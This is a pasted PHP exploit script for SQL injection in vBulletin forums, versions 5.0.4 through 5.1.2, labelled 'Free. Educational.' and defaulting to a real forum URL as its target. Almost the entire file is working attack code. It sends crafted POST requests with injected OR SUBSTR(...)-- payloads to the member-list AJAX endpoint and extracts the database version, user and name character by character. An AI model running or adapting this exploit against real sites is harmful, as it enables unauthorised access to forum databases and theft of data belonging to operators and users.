SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | ||
3 | /* | |
4 | Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video) | |
5 | http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html | |
6 | Author: Nytro | |
7 | Powered by: Romanian Security Team | |
8 | Price: Free. Educational. | |
9 | */ | |
10 | ||
11 | ||
12 | error_reporting(E_ALL); | |
13 | ini_set('display_errors', 1); | |
14 | ||
15 | ||
16 | // Get arguments | |
17 | ||
18 | ||
19 | $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; | |
20 | $expression = str_replace('/', '\\/', $target_url); | |
21 | ||
22 | ||
23 | // Function to send a POST request | |
24 | ||
25 | ||
26 | function httpPost($url,$params) | |
27 | { | |
28 | $ch = curl_init($url); | |
29 | ||
30 | ||
31 | curl_setopt($ch, CURLOPT_URL,$url); | |
32 | curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); | |
33 | curl_setopt($ch, CURLOPT_HEADER, false); | |
34 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
35 | curl_setopt($ch, CURLOPT_POST, 1); | |
36 | curl_setopt($ch, CURLOPT_POSTFIELDS, $params); | |
37 | ||
38 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( | |
39 | 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', | |
40 | 'Accept: application/json, text/javascript, */*; q=0.01', | |
41 | 'X-Requested-With: XMLHttpRequest', | |
42 | 'Referer: https://rstforums.com/v5/memberlist', | |
43 | 'Accept-Language: en-US,en;q=0.5', | |
44 | 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' | |
45 | )); | |
46 | ||
47 | ||
48 | $output = curl_exec($ch); | |
49 | ||
50 | if($output == FALSE) print htmlspecialchars(curl_error($ch)); | |
51 | ||
52 | ||
53 | curl_close($ch); | |
54 | return $output; | |
55 | } | |
56 | ||
57 | ||
58 | // Function to get string between two other strings | |
59 | ||
60 | ||
61 | function get_string_between($string, $start, $end) | |
62 | { | |
63 | $string = " ".$string; | |
64 | $ini = strpos($string,$start); | |
65 | if ($ini == 0) return ""; | |
66 | $ini += strlen($start); | |
67 | $len = strpos($string,$end,$ini) - $ini; | |
68 | return substr($string,$ini,$len); | |
69 | } | |
70 | ||
71 | ||
72 | // Get version | |
73 | ||
74 | ||
75 | print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; | |
76 | print "Version: "; | |
77 | ||
78 | ||
79 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
80 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' . | |
81 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
82 | ||
83 | ||
84 | $letter = 1; | |
85 | ||
86 | ||
87 | while(strpos($result, 'No Users Matched Your Query') == false) | |
88 | { | |
89 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); | |
90 | ||
91 | ||
92 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
93 | print $username[0]; | |
94 | ||
95 | $letter++; | |
96 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
97 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' . | |
98 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
99 | } | |
100 | ||
101 | ||
102 | // Get user | |
103 | ||
104 | ||
105 | print "\r\nUser: "; | |
106 | ||
107 | ||
108 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
109 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' . | |
110 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
111 | ||
112 | ||
113 | $letter = 1; | |
114 | ||
115 | ||
116 | while(strpos($result, 'No Users Matched Your Query') == false) | |
117 | { | |
118 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); | |
119 | ||
120 | ||
121 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
122 | print $username[0]; | |
123 | ||
124 | ||
125 | $letter++; | |
126 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
127 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . | |
128 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
129 | } | |
130 | ||
131 | ||
132 | // Get database | |
133 | ||
134 | ||
135 | print "\r\nDatabse: "; | |
136 | ||
137 | ||
138 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
139 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' . | |
140 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
141 | ||
142 | ||
143 | $letter = 1; | |
144 | ||
145 | ||
146 | while(strpos($result, 'No Users Matched Your Query') == false) | |
147 | { | |
148 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); | |
149 | ||
150 | ||
151 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
152 | print $username[0]; | |
153 | ||
154 | ||
155 | $letter++; | |
156 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
157 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' . | |
158 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
159 | } | |
160 | ||
161 | ||
162 | print "\r\n" | |
163 | ||
164 | ||
165 | ?> |